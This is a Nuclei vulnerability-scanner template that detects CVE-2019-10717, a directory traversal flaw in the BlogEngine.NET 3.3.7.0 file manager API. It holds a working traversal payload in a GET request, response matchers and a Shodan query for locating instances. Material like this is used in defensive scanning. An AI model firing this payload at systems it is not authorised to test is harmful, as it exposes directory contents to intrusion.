51 lines
1.7 KiB
YAML
51 lines
1.7 KiB
YAML
id: CVE-2019-10717
|
|
|
|
info:
|
|
name: BlogEngine.NET 3.3.7.0 - Local File Inclusion
|
|
author: arafatansari
|
|
severity: high
|
|
description: |
|
|
BlogEngine.NET 3.3.7.0 allows /api/filemanager local file inclusion via the path parameter
|
|
remediation: |
|
|
Upgrade to a patched version of BlogEngine.NET or apply the vendor-supplied patch to mitigate this vulnerability.
|
|
reference:
|
|
- https://www.securitymetrics.com/blog/Blogenginenet-Directory-Traversal-Listing-Login-Page-Unvalidated-Redirect
|
|
- https://github.com/rxtur/BlogEngine.NET/commits/master
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-10717
|
|
- http://seclists.org/fulldisclosure/2019/Jun/44
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
|
|
cvss-score: 7.1
|
|
cve-id: CVE-2019-10717
|
|
cwe-id: CWE-22
|
|
epss-score: 0.0042
|
|
epss-percentile: 0.7135
|
|
cpe: cpe:2.3:a:dotnetblogengine:blogengine.net:3.3.7.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: dotnetblogengine
|
|
product: blogengine.net
|
|
shodan-query: http.html:"Blogengine.net"
|
|
tags: seclists,cve,cve2019,blogengine,lfi,traversal,dotnetblogengine
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/api/filemanager?path=%2F..%2f..%2fContent"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/json"
|
|
|
|
- type: regex
|
|
regex:
|
|
- '~/App_Data/files/../../([a-zA-Z0-9\.\-]+)/([a-z0-9]+)'
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100bff19c94fa27af21182b9b2f0b632afa95c028a5305754486a0a7b7c8b62b31e022042ee083505a9af538ae610abc6c90993468a0c345430a6ea95a959ea4ac26c77:922c64590222798bb761d5b6d8e72950 |